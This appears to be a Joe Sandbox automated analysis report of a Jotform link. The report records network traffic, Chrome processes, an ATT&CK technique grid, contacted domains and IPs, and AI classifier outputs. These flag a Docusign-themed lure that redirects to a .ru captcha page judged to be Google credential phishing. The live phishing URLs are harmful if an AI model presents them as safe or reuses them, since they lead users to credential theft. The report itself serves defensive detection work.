      Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
      Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
      Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49740 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49741 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.16:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.16:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.16:49824 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 13.107.4.254:443 -> 192.168.2.16:49825 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 52.242.31.149:443 -> 192.168.2.16:49827 version: TLS 1.2
      Source: classification engineClassification label: mal68.phis.win@32/43@62/333
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://form.jotform.com/243186396374063"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4912 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4912 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4964 --field-trial-handle=1956,i,14690931794809149558,9491887679854791159,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe "C:\Program Files\Google\Chrome\Application\chrome_proxy.exe" --profile-directory=Default --app-id=aghbiahbpaijignceidepookljebhfak
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --source-shortcut="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk" --profile-directory=Default --app-id=aghbiahbpaijignceidepookljebhfak
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2008,i,15956938103317303017,5644695278685977479,262144 /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --source-shortcut="C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk" --profile-directory=Default --app-id=aghbiahbpaijignceidepookljebhfak
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2008,i,15956938103317303017,5644695278685977479,262144 /prefetch:8
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeSection loaded: winmm.dll
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeSection loaded: userenv.dll
      Source: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeSection loaded: kernel.appcore.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire Infrastructure1
      Drive-by Compromise
      Windows Management Instrumentation1
      Browser Extensions
      1
      Process Injection
      1
      Masquerading
      OS Credential Dumping1
      System Information Discovery
      Remote ServicesData from Local System2
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      Registry Run Keys / Startup Folder
      1
      Registry Run Keys / Startup Folder
      1
      DLL Side-Loading
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      https://form.jotform.com/2431863963740630%Avira URL Cloudsafe
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      NameIPActiveMaliciousAntivirus DetectionReputation
      cdn01.jotfor.ms
      104.22.73.81
      truefalse
        high
        docs.google.com
        142.250.185.174
        truefalse
          high
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            cdn.jotfor.ms
            104.22.72.81
            truefalse
              high
              www.jotform.com
              104.19.128.105
              truefalse
                high
                sheets.google.com
                142.250.184.206
                truefalse
                  unknown
                  go.lb.jotform.com
                  35.201.118.58
                  truefalse
                    high
                    code.jquery.com
                    151.101.130.137
                    truefalse
                      high
                      www3.l.google.com
                      216.58.206.46
                      truefalse
                        high
                        play.google.com
                        142.250.185.206
                        truefalse
                          high
                          submit.jotform.com
                          104.19.128.105
                          truefalse
                            high
                            cdn03.jotfor.ms
                            104.22.72.81
                            truefalse
                              high
                              www.google.com
                              142.250.186.68
                              truefalse
                                high
                                api.jotform.com
                                104.19.129.105
                                truefalse
                                  high
                                  s6m5.gwckpfsj.ru
                                  188.114.96.3
                                  truefalse
                                    high
                                    cdn02.jotfor.ms
                                    172.67.7.107
                                    truefalse
                                      high
                                      u0i80kuuob1iy6zegcwamjpmstb0jwt7jfjtna3zvl06tsuf2wys.ndshalox.com
                                      172.67.191.170
                                      truefalse
                                        unknown
                                        events.jotform.com
                                        104.19.129.105
                                        truefalse
                                          high
                                          files.jotform.com
                                          34.54.32.121
                                          truefalse
                                            high
                                            googlehosted.l.googleusercontent.com
                                            216.58.206.65
                                            truefalse
                                              high
                                              form.jotform.com
                                              unknown
                                              unknownfalse
                                                high
                                                accounts.youtube.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  blogger.googleusercontent.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    NameMaliciousAntivirus DetectionReputation
                                                    https://form.jotform.com/243186396374063true
                                                      unknown
                                                      https://s6m5.gwckpfsj.ru/MdmjiH0/true
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        142.250.186.68
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.185.206
                                                        play.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        104.19.129.105
                                                        api.jotform.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.185.227
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.185.202
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        151.101.130.137
                                                        code.jquery.comUnited States
                                                        54113FASTLYUSfalse
                                                        104.19.128.105
                                                        www.jotform.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.185.163
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.186.110
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        151.101.194.137
                                                        unknownUnited States
                                                        54113FASTLYUSfalse
                                                        35.190.80.1
                                                        a.nel.cloudflare.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.184.206
                                                        sheets.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.184.228
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.186.99
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        104.22.73.81
                                                        cdn01.jotfor.msUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.185.67
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        1.1.1.1
                                                        unknownAustralia
                                                        13335CLOUDFLARENETUSfalse
                                                        108.177.15.84
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        172.217.16.206
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.184.193
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        35.201.118.58
                                                        go.lb.jotform.comUnited States
                                                        15169GOOGLEUSfalse
                                                        172.217.18.3
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        216.58.206.65
                                                        googlehosted.l.googleusercontent.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.185.110
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        34.54.32.121
                                                        files.jotform.comUnited States
                                                        2686ATGS-MMD-ASUSfalse
                                                        172.67.7.107
                                                        cdn02.jotfor.msUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        216.58.206.46
                                                        www3.l.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        142.251.173.84
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        142.250.185.170
                                                        unknownUnited States
                                                        15169GOOGLEUSfalse
                                                        172.67.191.170
                                                        u0i80kuuob1iy6zegcwamjpmstb0jwt7jfjtna3zvl06tsuf2wys.ndshalox.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        239.255.255.250
                                                        unknownReserved
                                                        unknownunknownfalse
                                                        142.250.185.174
                                                        docs.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        188.114.96.3
                                                        s6m5.gwckpfsj.ruEuropean Union
                                                        13335CLOUDFLARENETUSfalse
                                                        104.22.72.81
                                                        cdn.jotfor.msUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        IP
                                                        192.168.2.16
                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1558826
                                                        Start date and time:2024-11-19 20:50:54 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                        Sample URL:https://form.jotform.com/243186396374063
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:19
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • EGA enabled
                                                        Analysis Mode:stream
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal68.phis.win@32/43@62/333
                                                        • Exclude process from analysis (whitelisted): svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 142.250.185.163, 172.217.16.206, 108.177.15.84, 34.104.35.123, 142.250.185.202, 216.58.206.42, 172.217.16.202, 142.250.186.42, 142.250.181.234, 172.217.16.138, 142.250.185.234, 142.250.184.202, 142.250.186.170, 142.250.186.106, 142.250.185.138, 172.217.18.106, 142.250.185.170, 142.250.186.138, 172.217.18.10, 142.250.186.74
                                                        • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, content-autofill.googleapis.com, clientservices.googleapis.com, clients.l.google.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • VT rate limit hit for: https://form.jotform.com/243186396374063
                                                        InputOutput
                                                        URL: https://form.jotform.com Model: Joe Sandbox AI
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": false,
                                                            "ip_in_url": false,
                                                            "long_subdomain": false,
                                                            "malicious_keywords": false,
                                                            "encoded_characters": false,
                                                            "redirection": false,
                                                            "contains_email_address": false,
                                                            "known_domain": true,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": false
                                                        }
                                                        URL: https://form.jotform.com
                                                        URL: https://form.jotform.com/243186396374063 Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "VIEW DOCUMENT",
                                                          "prominent_button_name": "VIEW DOCUMENT",
                                                          "text_input_field_labels": "unknown",
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://form.jotform.com/243186396374063 Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Docusign"
                                                          ]
                                                        }
                                                        URL: https://s6m5.gwckpfsj.ru Model: Joe Sandbox AI
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": true,
                                                            "ip_in_url": false,
                                                            "long_subdomain": true,
                                                            "malicious_keywords": false,
                                                            "encoded_characters": false,
                                                            "redirection": false,
                                                            "contains_email_address": false,
                                                            "known_domain": false,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": true
                                                        }
                                                        URL: https://s6m5.gwckpfsj.ru
                                                        URL: https://s6m5.gwckpfsj.ru/MdmjiH0/ Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "Enter the result",
                                                          "prominent_button_name": "Submit",
                                                          "text_input_field_labels": [
                                                            "Enter the result"
                                                          ],
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": true,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://s6m5.gwckpfsj.ru/MdmjiH0/ Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": []
                                                        }
                                                        ```
                                                        
                                                        The provided image does not contain any visible brand logos or identifiable brand names. The image shows a simple web page with a math problem and an input field to enter the result, along with a "Submit" button. There are no brand elements or logos visible in the header, footer, or any other part of the page.
                                                        URL: https://s6m5.gwckpfsj.ru/MdmjiH0/ Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": false,
                                                          "trigger_text": "unknown",
                                                          "prominent_button_name": "unknown",
                                                          "text_input_field_labels": "unknown",
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": true,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "to continue to Sheets",
                                                          "prominent_button_name": "Next",
                                                          "text_input_field_labels": [
                                                            "Email or phone"
                                                          ],
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://s6m5.gwckpfsj.ru/MdmjiH0/ Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Google"
                                                          ]
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "contains_trigger_text": true,
                                                          "trigger_text": "to continue to Sheets",
                                                          "prominent_button_name": "Next",
                                                          "text_input_field_labels": [
                                                            "Email or phone"
                                                          ],
                                                          "pdf_icon_visible": false,
                                                          "has_visible_captcha": false,
                                                          "has_urgent_text": false,
                                                          "has_visible_qrcode": false
                                                        }
                                                        URL: https://accounts.google.com Model: Joe Sandbox AI
                                                        {
                                                            "typosquatting": false,
                                                            "unusual_query_string": false,
                                                            "suspicious_tld": false,
                                                            "ip_in_url": false,
                                                            "long_subdomain": false,
                                                            "malicious_keywords": false,
                                                            "encoded_characters": false,
                                                            "redirection": false,
                                                            "contains_email_address": false,
                                                            "known_domain": true,
                                                            "brand_spoofing_attempt": false,
                                                            "third_party_hosting": false
                                                        }
                                                        URL: https://accounts.google.com
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Google"
                                                          ]
                                                        }
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json
                                                        {
                                                          "brands": [
                                                            "Google"
                                                          ]
                                                        }
                                                        URL: https://s6m5.gwckpfsj.ru/MdmjiH0/ Model: Joe Sandbox AI
                                                        ```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The brand 'Google' is well-known and typically associated with the domain 'google.com'.",    "The URL 's6m5.gwckpfsj.ru' does not match the legitimate domain for Google.",    "The domain uses a '.ru' extension, which is unusual for Google and could indicate a phishing attempt.",    "The URL structure appears random and does not resemble any known Google subdomains or services.",    "The presence of multiple input fields labeled as 'u, n, k, n, o, w, n' is suspicious and could be an attempt to collect sensitive information."  ],  "riskscore": 9}
                                                        Google indexed: False
                                                        URL: s6m5.gwckpfsj.ru
                                                                    Brands: Google
                                                                    Input Fields: u, n, k, n, o, w, n
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
                                                        ```json{  "legit_domain": "google.com",  "classification": "wellknown",  "reasons": [    "The URL 'accounts.google.com' is a subdomain of 'google.com', which is the legitimate domain for Google.",    "Google is a well-known brand with a strong online presence.",    "The URL does not contain any suspicious elements such as misspellings, extra characters, or unusual domain extensions.",    "The input fields 'Email or phone' are consistent with Google's account login pages."  ],  "riskscore": 1}
                                                        URL: accounts.google.com
                                                                    Brands: Google
                                                                    Input Fields: Email or phone
                                                        URL: https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&followup=https%3A%2F%2Fdocs.google.com%2Fspreadsheets%2F%3Fusp%3Ddirect_url&ifkv=AcMMx-d6_tyu8KNmVr5MWXQzht28ZZ4Us5nbOSVXfQ4t-z4Bc Model: Joe Sandbox AI
